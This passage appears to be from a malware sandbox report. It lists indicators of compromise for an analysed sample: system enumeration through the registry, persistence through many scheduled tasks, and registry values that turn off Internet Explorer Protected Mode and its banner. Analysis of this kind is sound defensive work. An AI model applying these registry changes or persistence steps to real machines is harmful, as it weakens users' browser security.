\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString schtasks.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 schtasks.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Ghxyq.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Ghxyq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2776 schtasks.exe 5776 schtasks.exe 4556 schtasks.exe 5688 schtasks.exe 5360 schtasks.exe 5936 schtasks.exe 5860 schtasks.exe 5448 schtasks.exe 60 schtasks.exe 8 schtasks.exe 5424 schtasks.exe 4376 schtasks.exe 4584 schtasks.exe 1200 schtasks.exe 3536 schtasks.exe 3320 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2772 WMIC.exe -
Enumerates system info in registry 2 TTPs 37 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe -
Kills process with taskkill 1 IoCs
pid Process 4524 taskkill.exe -
Modifies Internet Explorer Protected Mode 1 TTPs 56 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe -
Modifies Internet Explorer Protected Mode Banner 1 TTPs 14 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{6DBECE07-B486-11EE-B7F4-CAE9171F1CAB} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31082643" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31082643" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1111384595" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1125285308" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "412184995" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31082643" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1111364735" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main explorer.exe -
Modifies data under HKEY_USERS 64 IoCs
